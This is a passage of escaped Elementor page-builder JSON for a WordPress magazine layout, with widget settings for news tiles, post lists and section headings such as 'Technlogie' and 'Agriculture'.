":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_